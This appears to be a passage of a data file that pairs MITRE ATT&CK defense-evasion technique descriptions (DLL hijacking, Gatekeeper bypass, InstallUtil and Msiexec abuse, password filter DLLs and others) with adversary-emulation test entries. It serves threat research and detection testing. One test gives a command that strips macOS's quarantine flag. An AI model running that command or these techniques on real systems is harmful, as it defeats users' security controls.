T1218.004 - source_name: MSDN InstallUtil description: Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016. url: https://msdn.microsoft.com/en-us/library/50614e95.aspx - source_name: LOLBAS Installutil description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:34.798Z' name: 'Signed Binary Proxy Execution: InstallUtil' description: |- Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Travis Smith, Tripwire - Casey Smith x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.004 atomic_tests: [] T1027.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97 created: '2022-09-29T18:30:12.244Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/008 external_id: T1027.008 - source_name: intezer stripped binaries elf files 2018 description: 'Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.' url: https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/ - source_name: SentinelLabs reversing run-only applescripts 2021 description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022. url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/ - source_name: Mandiant golang stripped binaries explanation description: STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022. url: https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:18.337Z' name: Stripped Payloads description: |- Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018) Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS - Linux - Windows - Network Devices x_mitre_version: '1.2' atomic_tests: [] T1574.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 created: '2020-03-13T18:11:08.357Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/001 external_id: T1574.001 - source_name: Hijack DLLs CrowdStrike description: " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved January 30, 2025." url: https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/ - source_name: kroll bpl description: Dave Truman. (2024, June 24). Novel Technique Combination Used In IDATLOADER Distribution. Retrieved January 30, 2025. url: https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution - source_name: Sophos description: Gabor Szappanos. (2023, May 3). A doubled “Dragon Breath” adds new air to DLL sideloading attacks. Retrieved October 3, 2025. url: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/ - source_name: Hexacorn DLL Hijacking description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5. Retrieved August 14, 2024. url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/ - source_name: microsoft remote preloading description: 'Microsoft. (2014, May 13). Microsoft Security Advisory 2269637: Insecure Library Loading Could Allow Remote Code Execution. Retrieved January 30, 2025.' url: https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 - source_name: Microsoft - manifests/assembly description: Microsoft. (2021, January 7). Manifests. Retrieved January 30, 2025. url: https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN - source_name: Microsoft redirection description: Microsoft. (2023, October 12). Dynamic-link library redirection. Retrieved January 30, 2025. url: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN - source_name: dll pre load owasp description: OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025. url: https://owasp.org/www-community/attacks/Binary_planting - source_name: Virus Bulletin description: 'Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October 5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop Loader and EntryShell payload. Retrieved October 3, 2025.' url: https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/ - source_name: unit 42 description: 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22). Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30, 2025.' url: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/ - source_name: Wietze Beukema DLL Hijacking description: Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved April 8, 2025. url: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:35.900Z' name: 'Hijack Execution Flow: DLL' description: |- Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42) Specific ways DLLs are abused by adversaries include: ### DLL Sideloading Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s). Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process. Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl) Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos) ### DLL Search Order Hijacking Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42) ### DLL Redirection Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly) ### Phantom DLL Hijacking Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike) ### DLL Substitution Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking) Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses. Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading) If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak - Marina Liang - Ami Holeston, CrowdStrike - Will Alexander, CrowdStrike - Wietze Beukema @Wietze x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1574.001 atomic_tests: [] T1553.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e created: '2020-02-05T16:16:08.471Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/001 external_id: T1553.001 - source_name: Application Bundle Manipulation Brandon Dalton description: 'Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.' url: https://redcanary.com/blog/mac-application-bundles/ - source_name: theevilbit gatekeeper bypass 2021 description: Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021. url: https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/ - source_name: OceanLotus for OS X description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - source_name: TheEclecticLightCompany Quarantine and the flag description: hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021. url: https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/ - source_name: 'TheEclecticLightCompany apple notarization ' description: How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021. url: https://eclecticlight.co/2020/08/28/how-notarization-works/ - source_name: 20 macOS Common Tools and Techniques description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:36.535Z' name: 'Subvert Trust Controls: Gatekeeper Bypass' description: |- Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Brandon Dalton @PartyD0lphin - Swasti Bhushan Deb, IBM India Pvt. Ltd. x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS x_mitre_version: '1.3' identifier: T1553.001 atomic_tests: - name: Gatekeeper Bypass auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line ' supported_platforms: - macos input_arguments: app_path: description: Path to app to be used type: path default: myapp.app executor: command: 'xattr -d com.apple.quarantine #{app_path} ' name: sh T1553.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082 created: '2020-02-05T16:27:37.784Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/002 external_id: T1553.002 - source_name: EclecticLightChecksonEXECodeSigning description: 'Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.' url: https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/ - source_name: Securelist Digital Certificates description: Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016. url: https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/ - source_name: Symantec Digital Certificates description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. url: http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates - source_name: Wikipedia Code Signing description: Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016. url: https://en.wikipedia.org/wiki/Code_signing object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:37.098Z' name: Code Signing description: "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS - Windows x_mitre_version: '1.2' atomic_tests: [] T1036.009: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c created: '2023-09-27T19:49:40.815Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/009 external_id: T1036.009 - source_name: 3OHA double-fork 2022 description: Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023. url: https://0xjet.github.io/3OHA/2022/04/11/post.html - source_name: Microsoft XorDdos Linux Stealth 2022 description: 'Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.' url: https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ - source_name: Sandfly BPFDoor 2022 description: The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023. url: https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T21:54:02.243Z' name: Break Process Trees description: "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tim (Wadhwa-)Brown x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.0' atomic_tests: [] T1222.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee created: '2020-02-04T19:17:41.767Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1222/001 external_id: T1222.001 - source_name: Hybrid Analysis Icacls1 June 2018 description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - source_name: Hybrid Analysis Icacls2 May 2018 description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - source_name: Microsoft Access Control Lists May 2018 description: M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020. url: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists - source_name: Microsoft DACL May 2018 description: Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018. url: https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces - source_name: EventTracker File Permissions Feb 2014 description: Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. url: https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:37.826Z' name: 'File and Directory Permissions Modification: Windows File and Directory Permissions Modification' description: |- Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018) Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.2' identifier: T1222.001 atomic_tests: [] T1574.014: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8 created: '2024-03-28T15:36:34.141Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/014 external_id: T1574.014 - source_name: PenTestLabs AppDomainManagerInject description: Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND DETECTION. Retrieved March 28, 2024. url: https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/ - source_name: Microsoft App Domains description: Microsoft. (2021, September 15). Application domains. Retrieved March 28, 2024. url: https://learn.microsoft.com/dotnet/framework/app-domains/application-domains - source_name: PwC Yellow Liderc description: PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024. url: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html - source_name: Rapid7 AppDomain Manager Injection description: 'Spagnola, N. (2023, May 5). AppDomain Manager Injection: New Techniques For Red Teams. Retrieved March 29, 2024.' url: https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T21:48:08.401Z' name: AppDomainManager description: "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Thomas B - Ivy Drexel x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.0' atomic_tests: [] T1218.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 created: '2020-01-24T14:38:49.266Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/007 external_id: T1218.007 - source_name: TrendMicro Msiexec Feb 2018 description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ - source_name: LOLBAS Msiexec description: LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Msiexec/ - source_name: Microsoft msiexec description: Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - source_name: Microsoft AlwaysInstallElevated 2018 description: Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020. url: https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:38.626Z' name: 'Signed Binary Proxy Execution: Msiexec' description: |- Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Ziv Kaspersky, Cymptom - Alexandros Pappas x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.007 atomic_tests: [] T1556.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42 created: '2020-02-11T19:05:45.829Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1556/002 external_id: T1556.002 - source_name: Clymb3r Function Hook Passwords Sept 2013 description: Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017. url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ - source_name: Carnal Ownage Password Filters Sept 2013 description: Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017. url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:39.067Z' name: 'Modify Authentication Process: Password Filter DLL' description: "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious 